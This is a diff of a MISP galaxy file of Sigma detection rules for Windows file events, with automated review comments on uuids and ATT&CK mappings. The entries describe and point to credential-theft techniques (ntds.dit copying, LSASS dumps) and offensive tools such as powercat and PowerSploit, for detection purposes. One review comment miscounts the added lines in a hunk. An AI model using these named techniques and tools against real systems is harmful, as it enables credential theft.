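Review bot: this hunk deletes the entry with uuid `51eecf75-d069-43c7-9ea2-63f75499edd4` (3CXDesktopApp beaconing) outright, and nothing in the visible diff re-adds that uuid. Galaxy cluster uuids are referenced from existing MISP events, so a removed uuid leaves dangling tags; if the upstream rule was deprecated rather than deleted, consider keeping the entry (marked as deprecated) or recording the removed uuid in the changelog.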
@@ -34732,8 +34550,8 @@
"logsource.category": "network_connection",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md",
"https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_msiexec.yml"
],
"tags": [
@@ -34776,48 +34594,6 @@
"uuid": "7047d730-036f-4f40-b9d8-1c63e36d5e62",
"value": "Potential Binary Or Script Dropper Via PowerShell.EXE"
},
- {
- "description": "Detects suspicious processes that write (copy) a Active Directory database (ntds.dit) file",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2022/01/11",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "file_event_win_susp_ntds_dit.yml",
- "level": "high",
- "logsource.category": "file_event",
- "logsource.product": "windows",
- "refs": [
- "https://stealthbits.com/blog/extracting-password-hashes-from-the-ntds-dit-file/",
- "https://adsecurity.org/?p=2398",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_ntds_dit.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1003.002",
- "attack.t1003.003"
- ]
- },
- "related": [
- {
- "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "11b1ed55-154d-4e82-8ad7-83739298f720",
- "value": "Suspicious Process Writes Ntds.dit"
- },
{
"description": "Detects potential privilege escalation attempt via the creation of the \"*.Exe.Local\" folder inside the \"System32\" directory in order to sideload \"comctl32.dll\"",
"meta": {
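Review bot: the entry with uuid `11b1ed55-154d-4e82-8ad7-83739298f720` removed here reappears later in this patch with the same uuid under the new filename `file_event_win_ntds_dit_uncommon_process.yml`, so this is a rename, not a deletion. Because the generator orders entries by position rather than by uuid, the rename shows up as a 48-line removal plus a separate addition; keying output order on uuid would present this as an in-place edit.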
@@ -34845,38 +34621,81 @@
"value": "Potential Privilege Escalation Attempt Via .Exe.Local Technique"
},
{
- "description": "Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant",
+ "description": "Detects creation of \".vhd\"/\".vhdx\" files by browser processes.\nMalware can use mountable Virtual Hard Disk \".vhd\" files to encapsulate payloads and evade security controls.\n",
"meta": {
- "author": "@41thexplorer",
- "creation_date": "2018/11/20",
+ "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'",
+ "creation_date": "2021/10/25",
"falsepositive": [
- "Unlikely"
+ "Legitimate downloads of \".vhd\" files would also trigger this"
],
- "filename": "file_event_win_apt_cozy_bear_phishing_campaign_indicators.yml",
- "level": "critical",
+ "filename": "file_event_win_vhd_download_via_browsers.yml",
+ "level": "medium",
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/DrunkBinary/status/1063075530180886529",
- "https://www.mandiant.com/resources/blog/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_apt_cozy_bear_phishing_campaign_indicators.yml"
+ "https://redcanary.com/blog/intelligence-insights-october-2021/",
+ "https://www.kaspersky.com/blog/lazarus-vhd-ransomware/36559/",
+ "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_vhd_download_via_browsers.yml"
],
"tags": [
- "attack.execution",
- "attack.t1218.011"
+ "attack.resource_development",
+ "attack.t1587.001"
]
},
"related": [
{
- "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5",
+ "dest-uuid": "212306d8-efa4-44c9-8c2d-ed3d2e224aa0",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "related-to"
}
],
- "uuid": "3a3f81ca-652c-482b-adeb-b1c804727f74",
- "value": "APT29 2018 Phishing Campaign File Indicators"
+ "uuid": "8468111a-ef07-4654-903b-b863a80bbc95",
+ "value": "VHD Image Download Via Browser"
+ },
+ {
+ "description": "Detects creation of a file named \"ntds.dit\" (Active Directory Database) by an uncommon process or a process located in a suspicious directory",
+ "meta": {
+ "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)",
+ "creation_date": "2022/01/11",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "file_event_win_ntds_dit_uncommon_process.yml",
+ "level": "high",
+ "logsource.category": "file_event",
+ "logsource.product": "windows",
+ "refs": [
+ "https://adsecurity.org/?p=2398",
+ "https://stealthbits.com/blog/extracting-password-hashes-from-the-ntds-dit-file/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_dit_uncommon_process.yml"
+ ],
+ "tags": [
+ "attack.credential_access",
+ "attack.t1003.002",
+ "attack.t1003.003"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "11b1ed55-154d-4e82-8ad7-83739298f720",
+ "value": "NTDS.DIT Creation By Uncommon Process"
},
{
"description": "Detects files written by the different tools that exploit HiveNightmare",
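Review bot: this hunk silently drops the APT29 2018 phishing entry (uuid `3a3f81ca-652c-482b-adeb-b1c804727f74`); the diff renders it as an edit into the VHD entry, but the uuid, author, date and rule all change, so it is a removal plus an addition and should be reviewed as such (same dangling-uuid concern as the 3CX removal above). Separately, the new VHD entry tags `attack.resource_development` / `attack.t1587.001`, which is the pre-compromise "Develop Capabilities: Malware" technique, yet the rule fires on a browser writing a `.vhd` file on an endpoint; confirm that mapping is what the upstream rule intends.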
@@ -34891,10 +34710,10 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
+ "https://twitter.com/cube0x0/status/1418920190759378944",
+ "https://github.com/FireFart/hivenightmare/",
"https://github.com/GossiTheDog/HiveNightmare",
"https://github.com/WiredPulse/Invoke-HiveNightmare",
- "https://github.com/FireFart/hivenightmare/",
- "https://twitter.com/cube0x0/status/1418920190759378944",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_hivenightmare_file_exports.yml"
],
"tags": [
@@ -34928,9 +34747,9 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/",
- "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53",
"https://www.linkedin.com/pulse/outlook-backdoor-using-vba-samir-b-/",
+ "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53",
+ "https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_outlook_susp_macro_creation.yml"
],
"tags": [
@@ -34980,11 +34799,11 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
+ "https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles",
+ "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/",
"https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations",
"https://twitter.com/luc4m/status/1073181154126254080",
"https://twitter.com/malwrhunterteam/status/1235135745611960321",
- "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/",
- "https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_lnk_double_extension.yml"
],
"tags": [
@@ -35050,8 +34869,8 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md#atomic-test-2---credential-dumping-with-nppspy",
"https://twitter.com/0gtweet/status/1465282548494487554",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md#atomic-test-2---credential-dumping-with-nppspy",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_nppspy.yml"
],
"tags": [
@@ -35164,11 +34983,11 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://github.com/helpsystems/nanodump",
- "https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/",
"https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/credential_access_lsass_memdump_file_created.toml",
- "https://www.google.com/search?q=procdump+lsass",
+ "https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/",
"https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf",
+ "https://www.google.com/search?q=procdump+lsass",
+ "https://github.com/helpsystems/nanodump",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_dump.yml"
],
"tags": [
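Review bot: the moved context line `https://www.google.com/search?q=procdump+lsass` is a search query rather than a reference; its results change over time and it gives a reader nothing to verify. Worth dropping from the upstream rule's references when it is next touched.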
@@ -35260,12 +35079,12 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://blog.osarmor.com/319/onenote-attachment-delivers-asyncrat-malware/",
- "https://twitter.com/MaD_c4t/status/1623414582382567424",
"https://labs.withsecure.com/publications/detecting-onenote-abuse",
- "https://www.bleepingcomputer.com/news/security/hackers-now-use-microsoft-onenote-attachments-to-spread-malware/",
- "https://www.trustedsec.com/blog/new-attacks-old-tricks-how-onenote-malware-is-evolving/",
+ "https://twitter.com/MaD_c4t/status/1623414582382567424",
+ "https://blog.osarmor.com/319/onenote-attachment-delivers-asyncrat-malware/",
"https://app.any.run/tasks/17f2d378-6d11-4d6f-8340-954b04f35e83/",
+ "https://www.trustedsec.com/blog/new-attacks-old-tricks-how-onenote-malware-is-evolving/",
+ "https://www.bleepingcomputer.com/news/security/hackers-now-use-microsoft-onenote-attachments-to-spread-malware/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_onenote_susp_dropped_files.yml"
],
"tags": [
@@ -35288,8 +35107,8 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://www.jpcert.or.jp/english/pub/sr/ir_research.html",
"https://jpcertcc.github.io/ToolAnalysisResultSheet",
+ "https://www.jpcert.or.jp/english/pub/sr/ir_research.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_tool_psexec.yml"
],
"tags": [
@@ -35310,6 +35129,42 @@
"uuid": "259e5a6a-b8d2-4c38-86e2-26c5e651361d",
"value": "PsExec Service File Creation"
},
+ {
+ "description": "Detects creation of a file named \"ntds.dit\" (Active Directory Database) by an uncommon parent process or directory",
+ "meta": {
+ "author": "Florian Roth (Nextron Systems)",
+ "creation_date": "2022/03/11",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "file_event_win_ntds_dit_uncommon_parent_process.yml",
+ "level": "high",
+ "logsource.category": "file_event",
+ "logsource.product": "windows",
+ "refs": [
+ "https://pentestlab.blog/tag/ntds-dit/",
+ "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/",
+ "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration",
+ "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_dit_uncommon_parent_process.yml"
+ ],
+ "tags": [
+ "attack.credential_access",
+ "attack.t1003.003"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "4e7050dd-e548-483f-b7d6-527ab4fa784d",
+ "value": "NTDS.DIT Creation By Uncommon Parent Process"
+ },
{
"description": "Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs",
"meta": {
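Review bot: this new NTDS entry (uuid `4e7050dd-e548-483f-b7d6-527ab4fa784d`) tags only `attack.t1003.003` and maps to dest-uuid `edf91964-b26e-4b4a-9600-ccacd7d7df24`, while the companion entry `11b1ed55-...` re-added earlier in this patch carries both `attack.t1003.002` and `attack.t1003.003` with two `related` entries. The two rules detect the same artifact (creation of `ntds.dit`), so please confirm the differing technique sets are intentional in the upstream YAML and not a stale tag on one of them.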
@@ -35347,11 +35202,11 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
+ "https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles",
+ "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/",
"https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations",
"https://twitter.com/luc4m/status/1073181154126254080",
"https://twitter.com/malwrhunterteam/status/1235135745611960321",
- "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/",
- "https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_double_extension.yml"
],
"tags": [
@@ -35404,6 +35259,43 @@
"uuid": "5f87308a-0a5b-4623-ae15-d8fa1809bc60",
"value": "Suspicious Files in Default GPO Folder"
},
+ {
+ "description": "Detects creation of the Process Explorer drivers by processes other than Process Explorer (procexp) itself.\nHack tools or malware may use the Process Explorer driver to elevate privileges, drops it to disk for a few moments, runs a service using that driver and removes it afterwards.\n",
+ "meta": {
+ "author": "Florian Roth (Nextron Systems)",
+ "creation_date": "2023/05/05",
+ "falsepositive": [
+ "Some false positives may occur with legitimate renamed process explorer binaries"
+ ],
+ "filename": "file_event_win_sysinternals_procexp_driver_susp_creation.yml",
+ "level": "high",
+ "logsource.category": "file_event",
+ "logsource.product": "windows",
+ "refs": [
+ "https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/",
+ "https://www.elastic.co/security-labs/stopping-vulnerable-driver-attacks",
+ "https://github.com/Yaxser/Backstab",
+ "https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sysinternals_procexp_driver_susp_creation.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.privilege_escalation",
+ "attack.t1068"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "de46c52b-0bf8-4936-a327-aace94f94ac6",
+ "value": "Process Explorer Driver Creation By Non-Sysinternals Binary"
+ },
{
"description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.\nAdversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.\n",
"meta": {
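Review bot: the tags list `attack.persistence` alongside `attack.privilege_escalation` / `attack.t1068`, but the `related` block maps only to T1068 (dest-uuid `b21c3b2d-02e6-45b1-980b-e69051040839`) and the description speaks only of elevating privileges via the dropped driver; there is no persistence technique backing the persistence tactic tag. Check the upstream rule for a missing technique or a stray tactic tag. The description's "drops it to disk for a few moments, runs a service using that driver" also reads awkwardly and should be tidied upstream.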
@@ -35559,8 +35451,8 @@
"logsource.product": "windows",
"refs": [
"Internal Research",
- "https://labs.withsecure.com/publications/add-in-opportunities-for-office-persistence",
"https://github.com/redcanaryco/atomic-red-team/blob/4ae9580a1a8772db87a1b6cdb0d03e5af231e966/atomics/T1137.006/T1137.006.md",
+ "https://labs.withsecure.com/publications/add-in-opportunities-for-office-persistence",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_addin_persistence.yml"
],
"tags": [
@@ -35593,8 +35485,8 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://app.any.run/tasks/76c69e2d-01e8-49d9-9aea-fb7cc0c4d3ad/",
"https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae",
+ "https://app.any.run/tasks/76c69e2d-01e8-49d9-9aea-fb7cc0c4d3ad/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_executable_creation.yml"
],
"tags": [
@@ -35614,6 +35506,48 @@
"uuid": "74babdd6-a758-4549-9632-26535279e654",
"value": "Suspicious Executable File Creation"
},
+ {
+ "description": "Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters.\nThis is used as an obfuscation and masquerading techniques. Only \"perfect\" homoglyphs are included; these are characters that\nare indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters.\n",
+ "meta": {
+ "author": "Micah Babinski, @micahbabinski",
+ "creation_date": "2023/05/08",
+ "falsepositive": [
+ "File names with legitimate Cyrillic text. Will likely require tuning (or not be usable) in countries where these alphabets are in use."
+ ],
+ "filename": "file_event_win_susp_homoglyph_filename.yml",
+ "level": "medium",
+ "logsource.category": "file_event",
+ "logsource.product": "windows",
+ "refs": [
+ "http://www.irongeek.com/homoglyph-attack-generator.php",
+ "https://redcanary.com/threat-detection-report/threats/socgholish/#threat-socgholish",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_homoglyph_filename.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1036",
+ "attack.t1036.003"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "4f1707b1-b50b-45b4-b5a2-3978b5a5d0d6",
+ "value": "Potential Homoglyph Attack Using Lookalike Characters in Filename"
+ },
{
"description": "Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675",
"meta": {
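Review bot: the second `related` entry maps this homoglyph-filename rule to `attack.t1036.003` (dest-uuid `bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b`), which is "Rename System Utilities"; a lookalike-character filename is not necessarily a renamed system utility, so the parent T1036 mapping already present may be the only accurate one. Please check the sub-technique chosen in the upstream rule. The `falsepositive` note about Cyrillic-script filenames is useful and should stay.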
@@ -35628,8 +35562,8 @@
"logsource.product": "windows",
"refs": [
"https://github.com/hhlxf/PrintNightmare",
- "https://github.com/cube0x0/CVE-2021-1675",
"https://github.com/afwu/PrintNightmare",
+ "https://github.com/cube0x0/CVE-2021-1675",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_1675_printspooler.yml"
],
"tags": [
@@ -35689,10 +35623,10 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=79",
- "https://learn.microsoft.com/en-us/office/vba/outlook/concepts/outlook-forms/create-an-outlook-form",
"https://www.slipstick.com/developer/custom-form/clean-outlooks-forms-cache/",
+ "https://learn.microsoft.com/en-us/office/vba/outlook/concepts/outlook-forms/create-an-outlook-form",
"https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=76",
+ "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=79",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_outlook_newform.yml"
],
"tags": [
@@ -36162,11 +36096,11 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf",
+ "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer",
"https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html",
"https://labs.f-secure.com/blog/prelude-to-ransomware-systembc",
"https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/",
- "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer",
+ "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_advanced_ip_scanner.yml"
],
"tags": [
@@ -36234,22 +36168,25 @@
"logsource.product": "windows",
"refs": [
"https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1",
+ "https://github.com/samratashok/nishang",
+ "https://github.com/nettitude/Invoke-PowerThIEf",
+ "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1",
+ "https://github.com/Kevin-Robertson/Powermad",
"https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1",
+ "https://github.com/DarkCoderSc/PowerRunAsSystem/",
+ "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/",
+ "https://github.com/adrecon/ADRecon",
+ "https://github.com/NetSPI/PowerUpSQL",
+ "https://github.com/S3cur3Th1sSh1t/WinPwn",
+ "https://github.com/AlsidOfficial/WSUSpendu/",
"https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/",
"https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1",
- "https://github.com/HarmJ0y/DAMP",
- "https://github.com/samratashok/nishang",
- "https://github.com/AlsidOfficial/WSUSpendu/",
- "https://github.com/nettitude/Invoke-PowerThIEf",
- "https://github.com/DarkCoderSc/PowerRunAsSystem/",
- "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1",
"https://github.com/besimorhino/powercat",
+ "https://github.com/adrecon/AzureADRecon",
+ "https://github.com/HarmJ0y/DAMP",
"https://github.com/PowerShellMafia/PowerSploit",
- "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/",
- "https://github.com/S3cur3Th1sSh1t/WinPwn",
"https://github.com/CsEnox/EventViewer-UACBypass",
"https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries",
- "https://github.com/NetSPI/PowerUpSQL",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_exploit_scripts.yml"
],
"tags": [
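Review bot: of the fourteen `+` lines in this hunk only three are new references (github.com/adrecon/ADRecon, github.com/adrecon/AzureADRecon and github.com/Kevin-Robertson/Powermad); every other `+` line has a matching `-` line further down, so the remaining churn is reordering. Reviewers verifying reference quality only need to look at those three.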
@@ -36282,9 +36219,9 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/",
"https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html",
"https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html",
+ "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_exchange_webshell_drop_suspicious.yml"
],
"tags": [
@@ -36355,6 +36292,40 @@
"uuid": "7280c9f3-a5af-45d0-916a-bc01cb4151c9",
"value": "Suspicious MSExchangeMailboxReplication ASPX Write"
},
+ {
+ "description": "Detects suspicious file based on their extension being created in \"C:\\PerfLogs\\\". Note that this directory mostly contains \".etl\" files",
+ "meta": {
+ "author": "Nasreddine Bencherchali (Nextron Systems)",
+ "creation_date": "2023/05/05",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "filename": "file_event_win_perflogs_susp_files.yml",
+ "level": "medium",
+ "logsource.category": "file_event",
+ "logsource.product": "windows",
+ "refs": [
+ "https://labs.withsecure.com/publications/fin7-target-veeam-servers",
+ "Internal Research",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_perflogs_susp_files.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1059"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "bbb7e38c-0b41-4a11-b306-d2a457b7ac2b",
+ "value": "Suspicious File Created In PerfLogs"
+ },
{
"description": "Detects processes creating temp files related to PCRE.NET package",
"meta": {
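Review bot: "Internal Research" in refs is a free-text string, not a URL, so any consumer that renders refs as links gets a dead entry for this new "Suspicious File Created In PerfLogs" cluster; consider having the generator filter non-URL references out of refs or carry them in a separate field. The related block is consistent with the tags: dest-uuid 7385dfaf-6886-4229-9ecd-6fd678040830 is T1059, matching attack.t1059.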
@@ -36500,8 +36471,8 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://persistence-info.github.io/Data/powershellprofile.html",
"https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/",
+ "https://persistence-info.github.io/Data/powershellprofile.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_powershell_profile.yml"
],
"tags": [
@@ -36849,8 +36820,8 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/",
"https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd",
+ "https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_msdt_susp_directories.yml"
],
"tags": [
@@ -36885,8 +36856,8 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://www.zerodayinitiative.com/advisories/ZDI-21-1308/",
"https://github.com/klinix5/InstallerFileTakeOver",
+ "https://www.zerodayinitiative.com/advisories/ZDI-21-1308/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_41379_msi_lpe.yml"
],
"tags": [
@@ -36954,10 +36925,10 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://web.archive.org/web/20221026202428/https://gist.github.com/code-scrap/d7f152ffcdb3e0b02f7f394f5187f008",
"https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html",
- "https://github.com/olafhartong/sysmon-modular/blob/fa1ae53132403d262be2bbd7f17ceea7e15e8c78/11_file_create/include_dotnet.xml",
+ "https://web.archive.org/web/20221026202428/https://gist.github.com/code-scrap/d7f152ffcdb3e0b02f7f394f5187f008",
"https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/",
+ "https://github.com/olafhartong/sysmon-modular/blob/fa1ae53132403d262be2bbd7f17ceea7e15e8c78/11_file_create/include_dotnet.xml",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"
],
"tags": [
@@ -36990,9 +36961,9 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
+ "https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Output.cs",
